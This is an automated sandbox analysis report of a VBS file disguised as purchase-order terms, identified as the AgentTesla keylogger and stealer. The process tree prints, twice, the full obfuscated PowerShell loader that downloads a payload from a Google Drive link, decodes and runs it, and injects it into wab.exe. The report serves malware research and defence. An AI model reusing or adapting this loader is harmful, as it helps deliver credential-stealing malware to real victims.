Overview

overview

10

Static

static

1

LCS-155-44...ns.vbs

windows7-x64

10

LCS-155-44...ns.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    15/05/2024, 13:04

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    LCS-155-44 01_General_Purchase_Order_Terms_and_Conditions.vbs

  • Size

    424KB

  • MD5

    daa48dda60b2f2d7095a7190a75bdda8

  • SHA1

    b99a7214799a5f1680e49f5a2f80faf13537c013

  • SHA256

    137dba4596af3536acacb3ce1190517061eecc9703c1e3533b35319b99fcdc60

  • SHA512

    dad8a466a3dd01c5231c736399110cfdc0a02090368d66a8fcb6a527add1c1a1a9c0307823b5424ac4ebe11f9a0a0b3f029e6f7cfd4699945d5d776d4d2f8053

  • SSDEEP

    6144:z74t1fXGwzkAitPzmeI9OQYypkHkSVdtxQ+5iYgbAL0WMhw19+z0yhtHn9eq/+4X:zAJv0ayfOb64MRycngoavbN0vBrbjkLt

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LCS-155-44 01_General_Purchase_Order_Terms_and_Conditions.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2664
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Critic = 1;$Saddelmagerarbejder='Su';$Saddelmagerarbejder+='bstrin';$Saddelmagerarbejder+='g';Function Overindulgently($blyanttegningen){$Tangier=$blyanttegningen.Length-$Critic;For($Harmoniseringsndringer=1;$Harmoniseringsndringer -lt $Tangier;$Harmoniseringsndringer+=2){$Teletjenesterne+=$blyanttegningen.$Saddelmagerarbejder.Invoke( $Harmoniseringsndringer, $Critic);}$Teletjenesterne;}function Tights($Pseudoofficial){. ($Arkivdannelse) ($Pseudoofficial);}$Rutebaaden=Overindulgently 'HM o.zEi lIl,a,/U5 .E0, .( W iDnGdBo wDs. ,NGTH G1B0L..0 ;B MWCi nL6 4B;S x.6T4.;K RrRv :,1,2A1F..0T)K AG eHcSkHoE/K2S0 1 0 0R1 0M1S MF iOr e f.oTxV/L1 2R1 . 0N ';$Skgpantebreves=Overindulgently 'SUSs eFrR- A,g.eLn,tK ';$idiologism=Overindulgently ' hRt tRpIsi:C/ /Td rWiOvPeP.Sg oToIgElSes.Zc oTmS/AuOcC?Geax pFo r tO=,d oJw.nUlHoTaSd,& i,d =V1e7ClNm r h.WT8.cKG l 7Sv,n x NUrTF J W a r 8.y,V.WBjBtE_.M B.H,C ';$Syndfloderne=Overindulgently ',> ';$Arkivdannelse=Overindulgently 'Sipe xJ ';$Frtidspensionisten='Phosphorical';Tights (Overindulgently 'SS eRt.- CTo.n.tTe nRtE - PSaRt hG TU:M\SU n,p a t eSr.n a,l,. tSx tA - VDa lSuSeK S$BFVr t i,d,sFpTeEnisBi,oSnFiRs.t e nG;S ');Tights (Overindulgently ',i.f ( t eFsStF-MpUaHt h TP: \BUUnNpWaMtue rLnBa l . t,xWt.) {SetxsiHt.}.; ');$Bookmark = Overindulgently 'SeBcMh,o ,% aTpFpRdAaOtOau%T\Bt i dMs b eHsLt eHm t,.SS m,aS B&T& .e cMh oF $S ';Tights (Overindulgently ' $ gSl.oGb aGl.: L.nTgFs e,l.s.fGuPlNd ess =.( c,mKdD C/Rc N$RB.o.oVkUmGaIrNkD) ');Tights (Overindulgently ' $.gil o b arl : S k,e,l,l.eBtK=g$Gi dsiSo lCo g.i sUmd..s.p,lDiLtS(E$ SFy nKd f.l oRdTeCr,nOeM)K ');$idiologism=$Skellet[0];Tights (Overindulgently 'l$ g l.o bAaAlS:RONv eJr cVo nUfMiSd ernSc.eIs,1 6.7U=BN e wk-MOLbAj eOcVtE DS y sNtPeDmS.FN eutD.FW,e bSC l,i,e n,tP ');Tights (Overindulgently 'S$,OGvBe r c.o nEfPi dHeSnPcTeNsC1I6T7G..H e aHdSe,r,sU[ $ASFk gUp,amnSt,eSb,rDe vOe sO]U=,$YRKu t.eUb aOadd.eHn ');$Tolvfingertarmene=Overindulgently ',OAv elrsc o nSf.iAd eGn c eBs,1T6P7 . DAoFwSn,lPoRa d FTiflAe ( $ iSd i oAlEo gTiHsNm,, $mB e gLgPakr w eGeBdS)D ';$Tolvfingertarmene=$Lngselsfuldes[1]+$Tolvfingertarmene;$Beggarweed=$Lngselsfuldes[0];Tights (Overindulgently '.$FgTlRo,b aElM:UR.e,vSaVlLi,dMe rGe ngd eO=I(sTnePs t,-.P aLtVh, ,$jBLe.gAgAaFr wCe eBd )C ');while (!$Revaliderende) {Tights (Overindulgently 'S$Rg l o,b aEl,:FS.iUp,pFe nUi,p =K$St r,uUe ') ;Tights $Tolvfingertarmene;Tights (Overindulgently 'OS,t.aKr t -USGl e eEp, .4F ');Tights (Overindulgently 'E$Og,lUoDb,aTlV: RHeSv.a.lHiRd e rKe nDd eS=.(STAeLs tF- PRa.tFhG $DB e.gCg aUr whe efd,)U ') ;Tights (Overindulgently 'P$Pg,l o bFa lP:MA dSr e a m.= $ g.lvo bBaBl.:KG.aurSd e rGo,bOe rDn.eAs.+ +S%.$.SSk e,lcl eVtN.fc.oSu nCtS ') ;$idiologism=$Skellet[$Adream];}$Thaisilkens=345059;$Grundlovsforhr=26762;Tights (Overindulgently ' $ gDl oHb a.lR:,BBe n a rTb elj.dge r.s F=A G e,tA-.CDoKn,t,e nUtM P$ Bie,g g a r wAe e dL ');Tights (Overindulgently 'B$Eg l oRbSa,l,:Pv.uSltg,a rFi z e O=. [ SAyEs t,eSm,.SCRo.nGvTeBr.tU]P:A: F rPo mVB aTsVe 6.4ASMtDr i n.gA(.$NB e nUaIrSb,eFjcd ecr.s ) ');Tights (Overindulgently 'D$ g,l,o bVa lB:EFIo rVm e r n,eMsK .=A T[ S y sPt emmO.OTBe xKtC. E n.cEoBdDiBn gU].:R:SAAS CiI I,.DG estHSRtDrTiPnEgF( $Pv uBl g aSr iSz e ) ');Tights (Overindulgently 'A$Pg.l.o bGaRlB:LI n,tMr uPd r,eSsRs =U$TF,oBr m,eSrAn,eBsS.,s u b.sJtDr i,nBg (.$UT,hCaHiEs i l k e.n.s ,S$ GUrSu.n.dSl,o v.sTfKo.rRhNr ). ');Tights $Intrudress;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2340
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\tidsbestemt.Sma && echo $"
        3⤵
          PID:2472
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Critic = 1;$Saddelmagerarbejder='Su';$Saddelmagerarbejder+='bstrin';$Saddelmagerarbejder+='g';Function Overindulgently($blyanttegningen){$Tangier=$blyanttegningen.Length-$Critic;For($Harmoniseringsndringer=1;$Harmoniseringsndringer -lt $Tangier;$Harmoniseringsndringer+=2){$Teletjenesterne+=$blyanttegningen.$Saddelmagerarbejder.Invoke( $Harmoniseringsndringer, $Critic);}$Teletjenesterne;}function Tights($Pseudoofficial){. ($Arkivdannelse) ($Pseudoofficial);}$Rutebaaden=Overindulgently 'HM o.zEi lIl,a,/U5 .E0, .( W iDnGdBo wDs. ,NGTH G1B0L..0 ;B MWCi nL6 4B;S x.6T4.;K RrRv :,1,2A1F..0T)K AG eHcSkHoE/K2S0 1 0 0R1 0M1S MF iOr e f.oTxV/L1 2R1 . 0N ';$Skgpantebreves=Overindulgently 'SUSs eFrR- A,g.eLn,tK ';$idiologism=Overindulgently ' hRt tRpIsi:C/ /Td rWiOvPeP.Sg oToIgElSes.Zc oTmS/AuOcC?Geax pFo r tO=,d oJw.nUlHoTaSd,& i,d =V1e7ClNm r h.WT8.cKG l 7Sv,n x NUrTF J W a r 8.y,V.WBjBtE_.M B.H,C ';$Syndfloderne=Overindulgently ',> ';$Arkivdannelse=Overindulgently 'Sipe xJ ';$Frtidspensionisten='Phosphorical';Tights (Overindulgently 'SS eRt.- CTo.n.tTe nRtE - PSaRt hG TU:M\SU n,p a t eSr.n a,l,. tSx tA - VDa lSuSeK S$BFVr t i,d,sFpTeEnisBi,oSnFiRs.t e nG;S ');Tights (Overindulgently ',i.f ( t eFsStF-MpUaHt h TP: \BUUnNpWaMtue rLnBa l . t,xWt.) {SetxsiHt.}.; ');$Bookmark = Overindulgently 'SeBcMh,o ,% aTpFpRdAaOtOau%T\Bt i dMs b eHsLt eHm t,.SS m,aS B&T& .e cMh oF $S ';Tights (Overindulgently ' $ gSl.oGb aGl.: L.nTgFs e,l.s.fGuPlNd ess =.( c,mKdD C/Rc N$RB.o.oVkUmGaIrNkD) ');Tights (Overindulgently ' $.gil o b arl : S k,e,l,l.eBtK=g$Gi dsiSo lCo g.i sUmd..s.p,lDiLtS(E$ SFy nKd f.l oRdTeCr,nOeM)K ');$idiologism=$Skellet[0];Tights (Overindulgently 'l$ g l.o bAaAlS:RONv eJr cVo nUfMiSd ernSc.eIs,1 6.7U=BN e wk-MOLbAj eOcVtE DS y sNtPeDmS.FN eutD.FW,e bSC l,i,e n,tP ');Tights (Overindulgently 'S$,OGvBe r c.o nEfPi dHeSnPcTeNsC1I6T7G..H e aHdSe,r,sU[ $ASFk gUp,amnSt,eSb,rDe vOe sO]U=,$YRKu t.eUb aOadd.eHn ');$Tolvfingertarmene=Overindulgently ',OAv elrsc o nSf.iAd eGn c eBs,1T6P7 . DAoFwSn,lPoRa d FTiflAe ( $ iSd i oAlEo gTiHsNm,, $mB e gLgPakr w eGeBdS)D ';$Tolvfingertarmene=$Lngselsfuldes[1]+$Tolvfingertarmene;$Beggarweed=$Lngselsfuldes[0];Tights (Overindulgently '.$FgTlRo,b aElM:UR.e,vSaVlLi,dMe rGe ngd eO=I(sTnePs t,-.P aLtVh, ,$jBLe.gAgAaFr wCe eBd )C ');while (!$Revaliderende) {Tights (Overindulgently 'S$Rg l o,b aEl,:FS.iUp,pFe nUi,p =K$St r,uUe ') ;Tights $Tolvfingertarmene;Tights (Overindulgently 'OS,t.aKr t -USGl e eEp, .4F ');Tights (Overindulgently 'E$Og,lUoDb,aTlV: RHeSv.a.lHiRd e rKe nDd eS=.(STAeLs tF- PRa.tFhG $DB e.gCg aUr whe efd,)U ') ;Tights (Overindulgently 'P$Pg,l o bFa lP:MA dSr e a m.= $ g.lvo bBaBl.:KG.aurSd e rGo,bOe rDn.eAs.+ +S%.$.SSk e,lcl eVtN.fc.oSu nCtS ') ;$idiologism=$Skellet[$Adream];}$Thaisilkens=345059;$Grundlovsforhr=26762;Tights (Overindulgently ' $ gDl oHb a.lR:,BBe n a rTb elj.dge r.s F=A G e,tA-.CDoKn,t,e nUtM P$ Bie,g g a r wAe e dL ');Tights (Overindulgently 'B$Eg l oRbSa,l,:Pv.uSltg,a rFi z e O=. [ SAyEs t,eSm,.SCRo.nGvTeBr.tU]P:A: F rPo mVB aTsVe 6.4ASMtDr i n.gA(.$NB e nUaIrSb,eFjcd ecr.s ) ');Tights (Overindulgently 'D$ g,l,o bVa lB:EFIo rVm e r n,eMsK .=A T[ S y sPt emmO.OTBe xKtC. E n.cEoBdDiBn gU].:R:SAAS CiI I,.DG estHSRtDrTiPnEgF( $Pv uBl g aSr iSz e ) ');Tights (Overindulgently 'A$Pg.l.o bGaRlB:LI n,tMr uPd r,eSsRs =U$TF,oBr m,eSrAn,eBsS.,s u b.sJtDr i,nBg (.$UT,hCaHiEs i l k e.n.s ,S$ GUrSu.n.dSl,o v.sTfKo.rRhNr ). ');Tights $Intrudress;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2504
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\tidsbestemt.Sma && echo $"
            4⤵
              PID:2756
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2068

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\06819HIHXAYOY29504CE.temp
              Filesize

              7KB

              MD5

              55f2578bfe2735597cc71a6394caca74

              SHA1

              2a431ab2eb6f3b1718527ed5b52e673b684d4199

              SHA256

              6aef4c0ec10031197f6e60a20b2f58da87e869becd073c7d27dfcdf494468e04

              SHA512

              fbbeacd9d7229b1f72f3be339aaab27278abdab21bc5ac8ddea685961ed98b2949b081741508a52fce15e0d6cc3c6d1820e69d666d1f9cb14ad615e1d424b0b1

              Download Submit

            • C:\Users\Admin\AppData\Roaming\tidsbestemt.Sma
              Filesize

              484KB

              MD5

              37b5e04829f22394ecd93d96a6abb364

              SHA1

              1100d43b7f38319d657ccfdaa1c23b2fa9b8f787

              SHA256

              d81b1ebdbeacbeeb7ea1b5398ff1f2b2ff76a2386d23850f1c5ad0758475a2ac

              SHA512

              3c462bfc901eb7d66eb7875503b604b2b646857cac49a23713a066b8f8a5accadff453772b76285b769b01b6de7ec859338e416489dff38434cc17cdcb8a1915

              Download Submit

            • memory/2068-41-0x0000000000990000-0x00000000009D2000-memory.dmp

              Filesize

              264KB

              Download

            • memory/2068-39-0x0000000000990000-0x00000000019F2000-memory.dmp

              Filesize

              16.4MB

              Download

            • memory/2340-7-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

              Filesize

              9.6MB

              Download

            • memory/2340-8-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

              Filesize

              9.6MB

              Download

            • memory/2340-4-0x000007FEF610E000-0x000007FEF610F000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2340-14-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

              Filesize

              9.6MB

              Download

            • memory/2340-16-0x000007FEF610E000-0x000007FEF610F000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2340-6-0x0000000002A10000-0x0000000002A18000-memory.dmp

              Filesize

              32KB

              Download

            • memory/2340-40-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

              Filesize

              9.6MB

              Download

            • memory/2340-5-0x000000001B4B0000-0x000000001B792000-memory.dmp

              Filesize

              2.9MB

              Download

            • memory/2504-15-0x00000000064A0000-0x00000000081E5000-memory.dmp

              Filesize

              29.3MB

              Download